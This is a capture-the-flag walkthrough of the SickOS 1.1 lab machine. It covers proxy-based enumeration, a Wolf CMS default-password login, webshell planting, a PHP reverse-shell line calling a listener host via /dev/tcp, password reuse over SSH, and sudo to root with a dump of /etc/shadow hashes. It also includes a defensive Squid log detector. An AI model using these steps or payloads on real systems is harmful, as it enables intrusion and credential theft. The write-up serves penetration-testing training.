Download link
https://www.vulnhub.com/?q=SickOS1.1
Host discovery
nmap 192.168.52.0/24
Nmap scan report for localhost (192.168.52.142)
Host is up (0.00027s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:B8:7F:12 (VMware)
Port scanning
TCP scan
nmap -p- -A 192.168.52.142
Starting Nmap 7.91 ( https://nmap.org ) at 2023-06-05 03:56 EDT
Nmap scan report for localhost (192.168.52.142)
Host is up (0.00053s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:B8:7F:12 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms localhost (192.168.52.142)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.39 seconds
UDP scan
nmap -sU -p22,3128,8080 192.168.52.142
Starting Nmap 7.91 ( https://nmap.org ) at 2023-06-05 11:38 EDT
Nmap scan report for localhost (192.168.52.142)
Host is up (0.00043s latency).
PORT STATE SERVICE
22/udp open|filtered ssh
3128/udp open|filtered ndl-aas
8080/udp open|filtered http-alt
MAC Address: 00:0C:29:B8:7F:12 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
Vulnerability scanning
nmap
nmap -p- --script=vuln 192.168.52.142
Starting Nmap 7.91 ( https://nmap.org ) at 2023-06-05 11:19 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for localhost (192.168.52.142)
Host is up (0.00051s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:B8:7F:12 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 140.53 seconds
searchsploit
The scan shows port 3128 running the Squid service, so it is worth searching for known exploits.
searchsploit squid
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
MySQL Squid Access Report 2.1.4 - HTML Injection | php/webapps/20055.txt
MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Si | php/webapps/44483.txt
National Science Foundation Squid Proxy 2.3 - Internet Acc | linux/remote/24105.txt
National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - | linux/remote/19567.txt
PageSquid CMS 0.3 Beta - 'index.php' SQL Injection | php/webapps/5899.txt
Squid - 'httpMakeVaryMark()' Remote Denial of Service | linux/dos/38365.txt
Squid - NTLM (Authenticated) Overflow (Metasploit) | linux/remote/16847.rb
Squid 2.0-4 - Cache FTP Proxy URL Buffer Overflow | unix/remote/21297.c
Squid 2.4.1 - Remote Buffer Overflow | linux/remote/347.c
Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit) | multiple/remote/9951.rb
Squid 3.3.5 - Denial of Service (PoC) | linux/dos/26886.pl
Squid < 3.1 5 - HTTP Version Number Parsing Denial of Serv | multiple/dos/8021.pl
Squid Analysis Report Generator 2.3.10 - Remote Code Execu | php/webapps/42993.txt
Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Acce | linux/remote/23777.txt
Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service | linux/dos/29473.txt
Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connecti | cgi/remote/20465.sh
Squid Web Proxy 2.3 - Reverse Proxy | linux/remote/21017.txt
SquidGuard 1.4 - Long URL Handling Remote Denial of Servic | xml/dos/37685.txt
SquidGuard 1.x - NULL URL Character Unauthorized Access | linux/remote/23848.txt
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Directory scanning
Port 3128
gobuster dir -u http://192.168.52.142 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.52.142
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2023/06/05 11:26:27 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.52.142/: Get "http://192.168.52.142/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
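The scan found nothing.
Why think of scanning through a proxy? Direct requests to the web server time out, but the Squid proxy on port 3128 is open and can forward HTTP requests to the host for us.
Scanning through the proxy
Try using port 3128 as the proxy for the directory scan.
dirsearch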
dirsearch -u http://192.168.52.142 --proxy=http://192.168.52.142:3128
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.52.142/_23-06-05_11-51-12.txt
Error Log: /root/.dirsearch/logs/errors-23-06-05_11-51-12.log
Target: http://192.168.52.142/
[11:51:12] Starting:
[11:51:13] 403 - 293B - /.ht_wsr.txt
[11:51:13] 403 - 296B - /.htaccess.bak1
[11:51:13] 403 - 296B - /.htaccess.save
[11:51:13] 403 - 298B - /.htaccess.sample
[11:51:13] 403 - 297B - /.htaccess_extra
[11:51:13] 403 - 296B - /.htaccess.orig
[11:51:13] 403 - 296B - /.htaccess_orig
[11:51:13] 403 - 295B - /.htaccessOLD2
[11:51:13] 403 - 294B - /.htaccess_sc
[11:51:13] 403 - 294B - /.htaccessBAK
[11:51:14] 403 - 294B - /.htaccessOLD
[11:51:14] 403 - 286B - /.htm
[11:51:14] 403 - 287B - /.html
[11:51:14] 403 - 292B - /.htpasswds
[11:51:14] 403 - 296B - /.htpasswd_test
[11:51:14] 403 - 293B - /.httr-oauth
[11:51:25] 403 - 290B - /cgi-bin/
[11:51:27] 403 - 286B - /doc/
[11:51:27] 403 - 290B - /doc/api/
[11:51:27] 403 - 301B - /doc/html/index.html
[11:51:27] 403 - 300B - /doc/stable.version
[11:51:27] 403 - 301B - /doc/en/changes.html
[11:51:30] 200 - 21B - /index
[11:51:30] 200 - 21B - /index.php
[11:51:30] 200 - 21B - /index.php/login/
[11:51:39] 200 - 45B - /robots.txt
[11:51:39] 403 - 295B - /server-status
[11:51:39] 403 - 296B - /server-status/
dirb
dirb http://192.168.52.142 -p http://192.168.52.142:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jun 5 11:57:30 2023
URL_BASE: http://192.168.52.142/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.52.142:3128
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.52.142/ ----
+ http://192.168.52.142/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.52.142/connect (CODE:200|SIZE:109)
+ http://192.168.52.142/index (CODE:200|SIZE:21)
+ http://192.168.52.142/index.php (CODE:200|SIZE:21)
+ http://192.168.52.142/robots (CODE:200|SIZE:45)
+ http://192.168.52.142/robots.txt (CODE:200|SIZE:45)
+ http://192.168.52.142/server-status (CODE:403|SIZE:295)
-----------------
END_TIME: Mon Jun 5 11:57:32 2023
DOWNLOADED: 4612 - FOUND: 7
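connect and server-status stand out and are worth noting.
robots.txt, index.php and others also show up.
The dirsearch scan shows /index.php/login/, a login link.
These paths were only found through the proxy, so the browser also has to be configured to use the proxy to visit them.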
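The scans above reach the web server only by asking Squid to fetch URLs on its own host, and that traffic is recorded in Squid's access.log. The following Python code is an added example, not part of the original write-up: it flags clients that enumerate many paths on the proxy's own address. The native Squid log format is assumed; the log lines, thresholds, the client 192.168.52.20 and the names PROXY_SELF, target_of and self_targeting_clients are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption: addresses that belong to the proxy host itself. Requests for
# these hosts that arrive through the proxy reach services the packet filter
# hides from direct connections.
PROXY_SELF = {"192.168.52.142", "127.0.0.1", "localhost"}

# Squid native access.log layout:
#   time elapsed client action/status bytes method URL ident hierarchy type
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<action>[A-Z_]+)/(?P<status>\d{3})\s+(?P<size>\d+)\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)

# Constructed sample log (not captured from the target).
SAMPLE_LOG = """\
1685980272.101      4 192.168.52.134 TCP_MISS/403 651 GET http://192.168.52.142/.htaccess.bak1 - DIRECT/192.168.52.142 text/html
1685980272.140      3 192.168.52.134 TCP_MISS/403 651 GET http://192.168.52.142/.htpasswds - DIRECT/192.168.52.142 text/html
1685980284.310      3 192.168.52.134 TCP_MISS/403 645 GET http://192.168.52.142/cgi-bin/ - DIRECT/192.168.52.142 text/html
1685980286.022      2 192.168.52.134 TCP_MISS/404 640 GET http://192.168.52.142/backup - DIRECT/192.168.52.142 text/html
1685980289.500      5 192.168.52.134 TCP_MISS/200 376 GET http://192.168.52.142/index.php - DIRECT/192.168.52.142 text/html
1685980298.770      4 192.168.52.134 TCP_MISS/200 400 GET http://192.168.52.142/robots.txt - DIRECT/192.168.52.142 text/plain
1685980298.900      3 192.168.52.134 TCP_MISS/403 650 GET http://192.168.52.142/server-status - DIRECT/192.168.52.142 text/html
this line is malformed and must be skipped
1685980301.000     90 192.168.52.20 TCP_MISS/200 5120 GET http://example.com/ - DIRECT/203.0.113.10 text/html
1685980302.000      4 192.168.52.20 TCP_MISS/200 376 GET http://192.168.52.142/index.php - DIRECT/192.168.52.142 text/html
"""


def target_of(method, url):
    """Return (host, path) of a proxied request; CONNECT carries host:port only."""
    if method == "CONNECT":
        return url.rsplit(":", 1)[0], ""
    parts = urlsplit(url)
    return parts.hostname, parts.path or "/"


def self_targeting_clients(log_text, min_paths=5, min_error_ratio=0.5):
    """Flag clients that probe many distinct paths on the proxy's own host.

    A client is reported when it requested at least `min_paths` distinct
    paths on a PROXY_SELF address and at least `min_error_ratio` of those
    requests ended in 403/404, the pattern a wordlist scan produces.
    """
    stats = defaultdict(lambda: {"paths": set(), "errors": 0, "total": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not in the native format
        host, path = target_of(m["method"], m["url"])
        if host not in PROXY_SELF:
            continue  # ordinary outbound proxy use
        s = stats[m["client"]]
        s["total"] += 1
        s["paths"].add(path)
        if m["status"] in ("403", "404"):
            s["errors"] += 1

    findings = {}
    for client, s in stats.items():
        ratio = s["errors"] / s["total"]
        if len(s["paths"]) >= min_paths and ratio >= min_error_ratio:
            findings[client] = {
                "distinct_paths": len(s["paths"]),
                "requests": s["total"],
                "error_ratio": round(ratio, 2),
            }
    return findings


if __name__ == "__main__":
    for client, info in self_targeting_clients(SAMPLE_LOG).items():
        print(client, info)
```

On the Squid side, the corresponding control is an http_access deny rule for destinations that are the proxy's own addresses, so that port 3128 cannot be used to reach services the packet filter hides.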
Configuring the proxy
Open the browser's settings.
After that, the site can be reached from the browser.
Browsing
index.php
index.php/login/
robots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms
A CMS named wolf shows up, which is important information.
connect
Visiting it downloads a file.
Opening it:
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
robots.txt reveals the path /wolfcms, so visit it.
/wolfcms
Scan its directories as well.
dirb
dirb http://192.168.52.142/wolfcms/ -p http://192.168.52.142:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jun 5 21:33:04 2023
URL_BASE: http://192.168.52.142/wolfcms/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.52.142:3128
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.52.142/wolfcms/ ----
+ http://192.168.52.142/wolfcms/composer (CODE:200|SIZE:403)
+ http://192.168.52.142/wolfcms/config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.52.142/wolfcms/docs/
+ http://192.168.52.142/wolfcms/favicon.ico (CODE:200|SIZE:894)
+ http://192.168.52.142/wolfcms/index (CODE:200|SIZE:3975)
+ http://192.168.52.142/wolfcms/index.php (CODE:200|SIZE:3975)
==> DIRECTORY: http://192.168.52.142/wolfcms/public/
+ http://192.168.52.142/wolfcms/robots (CODE:200|SIZE:0)
+ http://192.168.52.142/wolfcms/robots.txt (CODE:200|SIZE:0)
---- Entering directory: http://192.168.52.142/wolfcms/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.52.142/wolfcms/public/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Jun 5 21:33:06 2023
DOWNLOADED: 4612 - FOUND: 7
dirsearch
dirsearch -u http://192.168.52.142/wolfcms/ --proxy=192.168.52.142:3128
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.52.142/-wolfcms-_23-06-05_21-42-22.txt
Error Log: /root/.dirsearch/logs/errors-23-06-05_21-42-22.log
Target: http://192.168.52.142/wolfcms/
[21:42:22] Starting:
[21:42:24] 403 - 301B - /wolfcms/.ht_wsr.txt
[21:42:24] 403 - 304B - /wolfcms/.htaccess.bak1
[21:42:24] 403 - 304B - /wolfcms/.htaccess.orig
[21:42:24] 403 - 306B - /wolfcms/.htaccess.sample
[21:42:24] 403 - 304B - /wolfcms/.htaccess.save
[21:42:24] 403 - 302B - /wolfcms/.htaccessOLD
[21:42:24] 403 - 305B - /wolfcms/.htaccess_extra
[21:42:24] 403 - 302B - /wolfcms/.htaccess_sc
[21:42:24] 403 - 303B - /wolfcms/.htaccessOLD2
[21:42:24] 403 - 302B - /wolfcms/.htaccessBAK
[21:42:24] 403 - 304B - /wolfcms/.htaccess_orig
[21:42:24] 403 - 294B - /wolfcms/.htm
[21:42:24] 403 - 295B - /wolfcms/.html
[21:42:24] 403 - 300B - /wolfcms/.htpasswds
[21:42:24] 403 - 301B - /wolfcms/.httr-oauth
[21:42:24] 403 - 304B - /wolfcms/.htpasswd_test
[21:42:26] 200 - 4KB - /wolfcms/CONTRIBUTING.md
[21:42:27] 200 - 2KB - /wolfcms/README.md
[21:42:36] 200 - 403B - /wolfcms/composer.json
[21:42:36] 200 - 0B - /wolfcms/config
[21:42:36] 200 - 0B - /wolfcms/config.php
[21:42:36] 200 - 0B - /wolfcms/config/
[21:42:36] 200 - 0B - /wolfcms/config/apc.php
[21:42:36] 200 - 0B - /wolfcms/config/app.php
[21:42:36] 200 - 0B - /wolfcms/config/app.yml
[21:42:36] 200 - 0B - /wolfcms/config/AppData.config
[21:42:36] 200 - 0B - /wolfcms/config/banned_words.txt
[21:42:36] 200 - 0B - /wolfcms/config/config.inc
[21:42:36] 200 - 0B - /wolfcms/config/autoload/
[21:42:36] 200 - 0B - /wolfcms/config/config.ini
[21:42:36] 200 - 0B - /wolfcms/config/database.yml
[21:42:36] 200 - 0B - /wolfcms/config/aws.yml
[21:42:36] 200 - 0B - /wolfcms/config/database.yml.sqlite3
[21:42:36] 200 - 0B - /wolfcms/config/database.yml.pgsql
[21:42:36] 200 - 0B - /wolfcms/config/database.yml~
[21:42:36] 200 - 0B - /wolfcms/config/db.inc
[21:42:36] 200 - 0B - /wolfcms/config/databases.yml
[21:42:36] 200 - 0B - /wolfcms/config/database.yml_original
[21:42:36] 200 - 0B - /wolfcms/config/initializers/secret_token.rb
[21:42:36] 200 - 0B - /wolfcms/config/master.key
[21:42:36] 200 - 0B - /wolfcms/config/development/
[21:42:36] 200 - 0B - /wolfcms/config/monkdonate.ini
[21:42:36] 200 - 0B - /wolfcms/config/monkid.ini
[21:42:36] 200 - 0B - /wolfcms/config/routes.yml
[21:42:36] 200 - 0B - /wolfcms/config/settings.inc
[21:42:36] 200 - 0B - /wolfcms/config/monkcheckout.ini
[21:42:36] 200 - 0B - /wolfcms/config/settings.ini.cfm
[21:42:36] 200 - 0B - /wolfcms/config/settings.ini
[21:42:36] 200 - 0B - /wolfcms/config/producao.ini
[21:42:36] 200 - 0B - /wolfcms/config/settings.local.yml
[21:42:36] 200 - 0B - /wolfcms/config/xml/
[21:42:36] 200 - 0B - /wolfcms/config/settings/production.yml
[21:42:36] 200 - 0B - /wolfcms/config/site.php
[21:42:38] 200 - 2KB - /wolfcms/docs/
[21:42:38] 301 - 323B - /wolfcms/docs -> http://192.168.52.142/wolfcms/docs/
[21:42:38] 200 - 7KB - /wolfcms/docs/updating.txt
[21:42:39] 200 - 894B - /wolfcms/favicon.ico
[21:42:41] 200 - 4KB - /wolfcms/index
[21:42:41] 200 - 4KB - /wolfcms/index.php
[21:42:41] 200 - 4KB - /wolfcms/index.php/login/
[21:42:48] 200 - 1KB - /wolfcms/public/
[21:42:48] 301 - 325B - /wolfcms/public -> http://192.168.52.142/wolfcms/public/
[21:42:49] 200 - 0B - /wolfcms/robots.txt
Task Completed
Browsing
/composer
The version shown is v1.0.12.
robots.txt
Nothing of interest.
config
Nothing of interest.
/docs
/public/
/themes
/simple
/wolf
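Approach
Normal article URLs also have a ? followed by other information, so ? followed by admin may be the administrator login path.
Finding the admin path
It can be found with a search engine: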
wolf cms admin path
Visit it:
http://192.168.52.142/wolfcms/?/admin/login
Password approach
Default passwords, weak passwords, or other hints.
Search with a search engine:
wolf cms default admin password
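From this, the username is most likely admin, but the password is unknown, so try weak passwords first and fall back to brute force if they fail. Note that five failed attempts trigger a 30-second lockout, which can be bypassed by other means.
Trying weak passwords
In the end, admin / admin works.
Logged in
Writing a webshell
Look for a feature that allows writing a webshell.
Clicking through shows a page for managing the home page template, where a webshell can be written directly.
Then connect with AntSword.
Because the site is only reachable through the proxy, AntSword also needs the proxy configured before it can connect to the shell.
Configuring the proxy in AntSword
Fill in the proxy details.
Connecting to the webshell
Reverse shell
A reverse shell can be written instead: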
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.52.134/14452 0>&1'");?>
The connection succeeds.
Gathering information
(www-data:/var/www/wolfcms) $ uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
(www-data:/var/www/wolfcms) $ whoami
www-data
(www-data:/var/www/wolfcms) $ sudo -l
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
(www-data:/var/www/wolfcms) $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
(www-data:/var/www/wolfcms) $ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
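The current user is www-data, which has few privileges.
/etc/passwd shows that the users with /bin/bash are root and sickos.
Look at what files are present, typically configuration files.
The file manager shows a file: config.php
Open it with vi: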
vi config.php
<?php
// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);
// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);
// The number of seconds before the check for a new Wolf version times out in case of problems.
define('CHECK_TIMEOUT', 3);
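The database account is root and the password is john@123.
The target has port 22 open, so an SSH login is worth trying.
For the account, consider the users with /bin/bash: root and sickos.
Try both, with john@123 as the password.
SSH connection
The SSH login finally succeeds.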
ssh sickos@192.168.52.142
Gathering information
sickos@SickOs:~$ uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ sudo -l
[sudo] password for sickos:
Matching Defaults entries for sickos on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sickos may run the following commands on this host:
(ALL : ALL) ALL
sickos@SickOs:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:b8:7f:12
inet addr:192.168.52.142 Bcast:192.168.52.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feb8:7f12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:41931 errors:26 dropped:26 overruns:0 frame:0
TX packets:39619 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:41839260 (41.8 MB) TX bytes:34739851 (34.7 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:503 errors:0 dropped:0 overruns:0 frame:0
TX packets:503 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:304468 (304.4 KB) TX bytes:304468 (304.4 KB)
sickos@SickOs:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
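Privilege escalation
cat /etc/shadow fails with permission denied, so escalate privileges. sudo -l shows that everything is ALL, so sudo su gives root, after which /etc/shadow can be read.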
sickos@SickOs:~$ sudo su
root@SickOs:/home/sickos# cat /etc/shadow
root:$6$0QtWAOH/$6uGGYVCw2lccBlovXeH8dqH6ILcCRZw.OydoldEZVS3m7RxgdUoZLl3UbDId59KMTUuxkGG/ln0gbwWSO7kNp.:16775:0:99999:7:::
daemon:*:16700:0:99999:7:::
bin:*:16700:0:99999:7:::
sys:*:16700:0:99999:7:::
sync:*:16700:0:99999:7:::
games:*:16700:0:99999:7:::
man:*:16700:0:99999:7:::
lp:*:16700:0:99999:7:::
mail:*:16700:0:99999:7:::
news:*:16700:0:99999:7:::
uucp:*:16700:0:99999:7:::
proxy:*:16700:0:99999:7:::
www-data:*:16700:0:99999:7:::
backup:*:16700:0:99999:7:::
list:*:16700:0:99999:7:::
irc:*:16700:0:99999:7:::
gnats:*:16700:0:99999:7:::
nobody:*:16700:0:99999:7:::
libuuid:!:16700:0:99999:7:::
syslog:*:16700:0:99999:7:::
messagebus:*:16700:0:99999:7:::
whoopsie:*:16700:0:99999:7:::
landscape:*:16700:0:99999:7:::
sshd:*:16700:0:99999:7:::
sickos:$6$x3xnQBfR$4WohiqaIzmpfk1duLLeJqA33zNhEQeuvPS4NiLLIxxOyNwz2dRMUbah.MZ0gSVMV4YNJC6meNpxa4YSrSJ75X.:16700:0:99999:7:::
mysql:!:16774:0:99999:7:::
Reading the flag
root@SickOs:/home/sickos# cd /
root@SickOs:/# ls
bin dev home lib media opt root sbin srv tmp var
boot etc initrd.img lost+found mnt proc run selinux sys usr vmlinuz
root@SickOs:/# cd root
root@SickOs:~# ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying
That is the end.
Learning source: 红队笔记 (Red Team Notes) on Bilibili.
Solution 2
Nikto scan
Reference links
https://blog.csdn.net/m0_54471074/article/details/128623767
https://www.cnblogs.com/opama/p/4928657.html
Scanning through the proxy
nikto -h 192.168.52.142 -useproxy 192.168.52.142:3128
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.52.142
+ Target Hostname: 192.168.52.142
+ Target Port: 80
+ Proxy: 192.168.52.142:3128
+ Start Time: 2023-06-08 20:38:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Retrieved via header: 1.0 localhost (squid/3.1.19).
+ /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 19:35:02 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ : Server banner changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19'.
+ /: Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /cgi-bin/status: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8912 requests: 2 error(s) and 20 item(s) reported on remote host
+ End Time: 2023-06-08 20:39:24 (GMT-4) (65 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The scan identifies the squid/3.1.19 service and Apache/2.2.22, and also reports:
/cgi-bin/status: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
/cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
